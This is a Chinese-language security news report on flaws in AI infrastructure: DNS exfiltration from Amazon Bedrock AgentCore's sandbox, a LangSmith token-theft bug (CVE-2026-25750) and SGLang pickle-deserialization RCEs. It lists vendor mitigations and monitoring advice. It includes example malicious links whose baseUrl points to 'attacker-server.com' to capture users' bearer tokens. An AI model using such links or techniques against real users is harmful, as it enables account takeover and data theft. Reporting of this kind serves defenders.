網路安全研究人員揭露了一種利用網域名稱系統 (DNS) 查詢從人工智慧 (AI) 程式碼執行環境中竊取敏感資料的新方法的細節。BeyondTrust週一發布的一份報告披露，亞馬遜Bedrock AgentCore代碼解釋器的沙箱模式允許發出出站DNS查詢，攻擊者可利用此漏洞啟用互動式shell並繞過網路隔離。該漏洞目前尚未獲得CVE編號，其CVSS評分為7.5分（滿分10分）。

Amazon Bedrock AgentCore 程式碼解釋器是一項完全託管的服務，它使 AI 代理程式能夠在隔離的沙箱環境中安全地執行程式碼，從而確保代理程式工作負載無法存取外部系統。該服務由亞馬遜於 2025 年 8 月推出。

BeyondTrust 的首席安全架構師 Kinnaird McQuade 表示，儘管配置了“無網路存取”，但該服務仍允許 DNS 查詢，這可能使“威脅行為者在某些情況下透過 DNS 建立命令和控制通道以及資料洩露，從而繞過預期的網路隔離控制”。

此外，DNS 通訊機制還可以被濫用，以向程式碼解釋器傳遞額外的有效載荷，使其輪詢 DNS 命令和控制 (C2) 伺服器以取得儲存在 DNS A 記錄中的命令，執行這些命令，並透過 DNS 子網域查詢傳回結果。值得注意的是，程式碼解釋器需要 IAM 角色才能存取 AWS 資源。然而，一個簡單的疏忽就可能導致為該服務分配權限過高的角色，從而賦予其存取敏感資料的廣泛權限。
BeyondTrust表示：「這項研究表明，DNS解析會如何破壞沙盒代碼解釋器的網路隔離保證。攻擊者可以利用這種方法，從可透過程式碼解釋器的IAM角色存取的AWS資源中竊取敏感數據，從而可能導致服務中斷、敏感客戶資訊外洩或基礎設施被刪除。」

亞馬遜在2025年9月負責任地揭露相關資訊後，認定這是預期功能而非缺陷，並敦促客戶使用VPC模式而非沙盒模式以實現完全的網路隔離。這家科技巨頭也建議使用DNS防火牆來過濾出站DNS流量。
Sectigo 高級研究員 Jason Soroko 表示：「為了保護敏感工作負載，管理員應清點所有活動的 AgentCore 代碼解釋器實例，並立即將處理關鍵數據的實例從沙盒模式遷移到 VPC 模式。」

「在虛擬專用網路 (VPC) 內運行可提供強大的網路隔離所需的必要基礎設施，使團隊能夠實施嚴格的安全群組、網路存取控制清單 (ACL) 和 Route53 解析器 DNS 防火牆，以監控和阻止未經授權的 DNS 解析。最後，安全團隊必須嚴格審核附加到這些解析器的身份和存取管理 (IAM) 角色，以嚴格執行安全範圍執行的潛在安全漏洞。」

LangSmith 易受帳戶接管漏洞影響

此揭露正值 Miggo Security 揭露LangSmith存在高風險安全漏洞（CVE-2026-25750，CVSS 評分：8.5）之際。該漏洞可能導致用戶令牌被盜和帳戶被接管。此問題影響自託管和雲端部署，已在 2025 年 12 月發布的 LangSmith 0.12.71 版本中修復。

這個缺陷被描述為 URL 參數注入，原因是缺少對 baseUrl 參數的驗證，攻擊者可以利用社會工程學技術（例如誘騙受害者點擊如下所示的特製鏈接）竊取已登錄用戶的 bearer token、用戶 ID 和工作區 ID，並將這些信息傳輸到他們控制的伺服器 -

✓  雲端 - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com

✓  自託管 - <LangSmith_domain_of_the_customer>/studio/?baseUrl=https://attacker-server.com

成功利用此漏洞可能使攻擊者獲得對 AI 追蹤歷史記錄的未經授權的訪問，並透過審查工具呼叫來暴露內部 SQL 查詢、CRM 客戶記錄或專有原始程式碼。

Miggo 的研究人員 Liad Eliyahu 和 Eliana Vuijsje表示：“登入 LangSmith 的用戶只需訪問攻擊者控制的網站或點擊惡意鏈接，就可能被攻破。”

「這個漏洞提醒我們，人工智慧可觀測性平台如今已成為關鍵基礎設施。由於這些工具優先考慮開發者的靈活性，它們常常會在無意中繞過安全防護措施。更糟糕的是，與『傳統』軟體一樣，人工智慧代理可以深度存取內部資料來源和第三方服務。”

SGLang 中不安全的 Pickle 反序列化缺陷

SGLang（一個用於服務大型語言模型和多模態 AI 模型的熱門開源框架）也存在安全漏洞，如果這些漏洞被成功利用，可能會觸發不安全的 pickle 反序列化，從而可能導致遠端執行程式碼。這些漏洞由Orca安全研究員Igor Stepansky發現，截至發稿時仍未修復。漏洞簡述如下：

✓  CVE-2026-3059（CVSS評分：9.8）－此漏洞利用ZeroMQ（又稱ZMQ）代理，在未經身份驗證的情況下，透過pickle.loads()反序列化不受信任的數據，從而導致遠端程式碼執行漏洞。此漏洞影響SGLang的多模態生成模組。

✓  CVE-2026-3060（CVSS評分：9.8）－此漏洞利用了SGLang的編碼器並行解耦系統，透過未經身份驗證的解耦模組，利用pickle.loads()反序列化不受信任的數據，從而導致未經身份驗證的遠端程式碼執行漏洞。

✓  CVE-2026-3989（CVSS 評分：7.8）- SGLang 的「replay_request_dump.py」中使用了不安全的 pickle.load() 函數，沒有進行驗證和正確的反序​​列化，可以透過提供惡意 pickle 檔案來利用此漏洞。

Stepansky說：「前兩種漏洞允許針對任何向網路暴露其多模態生成或解耦功能的 SGLang 部署進行未經身份驗證的遠端程式碼執行。第三種漏洞涉及崩潰轉儲重播實用程式中的不安全反序列化。」

CERT 協調中心 (CERT/CC) 在協調建議中表示，當啟用多模態產生系統時，SGLang 容易受到 CVE-2026-3059 的攻擊；當啟用編碼器並行分解系統時，SGLang 容易受到 CVE-2026-3060 的攻擊。

CERT/CC 表示：「如果滿足任一條件，並且攻擊者知道 ZMQ 代理正在監聽的 TCP 端口，並且可以向伺服器發送請求，他們就可以通過向代理髮送惡意 pickle 文件來利用此漏洞，然後代理會將其反序列化。」

建議 SGLang 用戶限制對服務介面的訪問，並確保這些介面不會暴露在不受信任的網路中。此外，也建議實施適當的網路分段和存取控制，以防止未經授權的使用者與 ZeroMQ 端點互動。

雖然沒有證據表明這些漏洞已被實際利用，但監控以下情況至關重要：對 ZeroMQ 代理端口的意外入站 TCP 連接、SGLang Python 進程生成的意外子進程、SGLang 進程在不尋常位置創建的文件，以及 SGLang 進程到意外目標的出站連接。

資料來源：https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html